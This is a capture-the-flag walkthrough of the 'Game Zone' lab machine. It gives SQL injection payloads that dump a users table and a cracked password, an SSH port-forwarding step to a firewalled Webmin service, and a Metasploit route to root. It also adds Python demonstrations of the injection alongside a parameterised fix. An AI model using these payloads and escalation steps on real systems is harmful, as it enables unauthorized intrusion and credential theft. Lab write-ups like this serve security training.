Game Zone

SQLi Initial Foothold - Reverse SSH tunneling PrivEsc


Last updated 2 years ago

  • Starting off with the nmap scan

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
|   256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_  256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Game Zone
  • The SSH service version doesn't seem to be vulnerable and we don't have any valid credentials, so our only attack vector is port 80.

  • Visiting the HTTP service, we get a login page.

  • Tried some default credentials like admin:password, administrator:password and admin:admin - none of them worked!

  • Now our only option is to try some boolean-based SQLi payloads such as ' or 2=2 --

  • Got redirected to another page called /portal.php

Since the payload only worked with a space after the -- comment marker, it confirms that the backend database is MySQL (MySQL requires whitespace after --).

  • There is another input field that takes the user input and selects the game name directly from the DB, which makes it vulnerable to SQLi too. In order to exploit this, let's trick the DB by injecting a few SQL queries:

' ORDER BY 1 --        # SQL error
' ORDER BY 2 --        # SQL error
' ORDER BY 3 --        # No error, confirms the query returns 3 columns

' UNION select 1, 2, 3 --
' union select 1,@@version,3 --
' UNION select 1, 2, table_name FROM information_schema.tables --
' UNION select 1, 2, column_name FROM information_schema.columns WHERE table_name = 'users' --
' UNION select 1, username, pwd FROM users --

agent47 : ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14

  • Cracking this hash gives videogamer124 - now let's log in as agent47 via SSH
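An added example (not the room's code) that reproduces the portal's flaw against a constructed in-memory sqlite3 database standing in for MySQL: the ORDER BY probe and the UNION payload from the page pull the users table out of the concatenated query, while the parameterised version treats the same input as plain data. The games/users schema and query shape are assumptions; the rows are made up.

```python
import hashlib
import sqlite3

# Constructed stand-in for the portal's backend: sqlite3 in memory instead of
# MySQL; the games/users schema mirrors what the UNION queries revealed.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE games (id INTEGER, title TEXT, genre TEXT);
        INSERT INTO games VALUES (1, 'Hitman', 'stealth'), (2, 'Doom', 'shooter');
        CREATE TABLE users (username TEXT, pwd TEXT);
    """)
    # Unsalted SHA-256, as on the page: one dictionary lookup away from plaintext.
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("agent47", hashlib.sha256(b"constructed-password").hexdigest()))
    return db

def search_vulnerable(db, term):
    # Assumed shape of the portal's query: the search term is spliced into the SQL.
    sql = f"SELECT id, title, genre FROM games WHERE title = '{term}'"
    return db.execute(sql).fetchall()

def search_fixed(db, term):
    # Hardened form: a bound parameter, so the term is data and can never become SQL.
    return db.execute("SELECT id, title, genre FROM games WHERE title = ?",
                      (term,)).fetchall()

def count_columns(db, max_cols=10):
    # The ORDER BY probe from the page, generalised: the first n that raises an
    # error is one past the number of columns the original SELECT returns.
    for n in range(1, max_cols + 1):
        try:
            search_vulnerable(db, f"' ORDER BY {n} --")
        except sqlite3.OperationalError:
            return n - 1
    return None

# The UNION payload from the page, padded to the column count the probe found.
UNION_PAYLOAD = "' UNION SELECT 1, username, pwd FROM users --"

if __name__ == "__main__":
    db = build_db()
    print("columns:", count_columns(db))                        # 3
    print("vulnerable:", search_vulnerable(db, UNION_PAYLOAD))  # leaks agent47's hash
    print("fixed:", search_fixed(db, UNION_PAYLOAD))            # []
```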

Privilege Escalation

  • The escalation vector is only via the reverse SSH tunneling concept, so what is it?

Reverse SSH tunneling, or reverse SSH port forwarding (ssh -R), specifies that a given port on the remote server host is to be forwarded to a given host and port on the local side. Note that the command used below is the mirror image, local port forwarding (ssh -L): a port on our own machine is forwarded to a host and port as seen from the remote server, which is what lets us reach a service the target's firewall hides from the outside.

Why are we doing this?

  • Suppose a site is blocked from where we are: we can forward the traffic through a server we control and browse the site via localhost:<PORT>.

  • Let's enumerate which services are listening on the box using ss or netstat:

agent47@gamezone:~$ ss -tulpn
Netid  State      Recv-Q Send-Q           Local Address:Port                          Peer Address:Port              
udp    UNCONN     0      0                            *:10000                                    *:*                  
udp    UNCONN     0      0                            *:68                                       *:*                  
tcp    LISTEN     0      80                   127.0.0.1:3306                                     *:*                  
tcp    LISTEN     0      128                          *:10000                                    *:*                  
tcp    LISTEN     0      128                          *:22                                       *:*                  
tcp    LISTEN     0      128                         :::80                                      :::*                  
tcp    LISTEN     0      128                         :::22                                      :::*             

Port 10000 is listening on all interfaces but didn't show up in the nmap scan, so it must be filtered by a firewall rule from the outside. With an SSH tunnel through the session we already have, we can reach the port locally!
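The same comparison as an added audit helper (not part of the writeup): it parses an ss -tulpn listing (the sample below is the one from above with the columns tightened) and reports which TCP services are bound to all interfaces yet absent from the external scan, i.e. protected only by the firewall, exactly the situation with Webmin on 10000. The external port set is assumed from the nmap output.

```python
# Sample ss -tulpn output, taken from the listing on this page (columns tightened).
SS_SAMPLE = """\
Netid  State      Recv-Q Send-Q Local Address:Port   Peer Address:Port
udp    UNCONN     0      0                *:10000              *:*
udp    UNCONN     0      0                *:68                 *:*
tcp    LISTEN     0      80       127.0.0.1:3306               *:*
tcp    LISTEN     0      128              *:10000              *:*
tcp    LISTEN     0      128              *:22                 *:*
tcp    LISTEN     0      128             :::80                :::*
tcp    LISTEN     0      128             :::22                :::*
"""

LOOPBACK = {"127.0.0.1", "::1", "[::1]"}

def parse_ss(text):
    """Parse ss -tulpn style output into dicts with proto, addr, port and loopback flag."""
    listeners = []
    for line in text.splitlines()[1:]:          # skip the header row
        fields = line.split()
        if len(fields) < 5:
            continue
        # Local Address:Port is the 5th column; split on the last ':' so ':::80' works.
        addr, _, port = fields[4].rpartition(":")
        listeners.append({
            "proto": fields[0],
            "addr": addr,
            "port": int(port),
            "loopback": addr in LOOPBACK,
        })
    return listeners

def firewall_only_services(listeners, externally_open):
    """TCP ports bound to all interfaces that the external scan did not see."""
    return sorted({
        l["port"] for l in listeners
        if l["proto"] == "tcp" and not l["loopback"]
        and l["port"] not in externally_open
    })

def loopback_only_services(listeners):
    """Ports deliberately limited to localhost (reachable only by a local user or a tunnel)."""
    return sorted({l["port"] for l in listeners if l["loopback"]})

if __name__ == "__main__":
    ls = parse_ss(SS_SAMPLE)
    # Assumed external view: the nmap scan above only showed 22 and 80.
    print("firewall-only:", firewall_only_services(ls, {22, 80}))   # [10000]
    print("loopback-only:", loopback_only_services(ls))             # [3306]
```

Anything in the firewall-only list should be bound to loopback or have its own authentication reviewed, since a firewall rule stops no one who already has a shell.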

ssh -L 10000:127.0.0.1:10000 agent47@10.10.60.68

  • Visiting localhost:10000 on our own machine gives us a Webmin portal - tried agent47's credentials and we get in!

  • We find the version of this Webmin interface; a search for public exploits turned up a Metasploit module.

  • Set the options and run the exploit to get R00T :)

Reference: What is SSH Tunnel, SSH Reverse Tunnel and SSH Port Forwarding? (goteleport)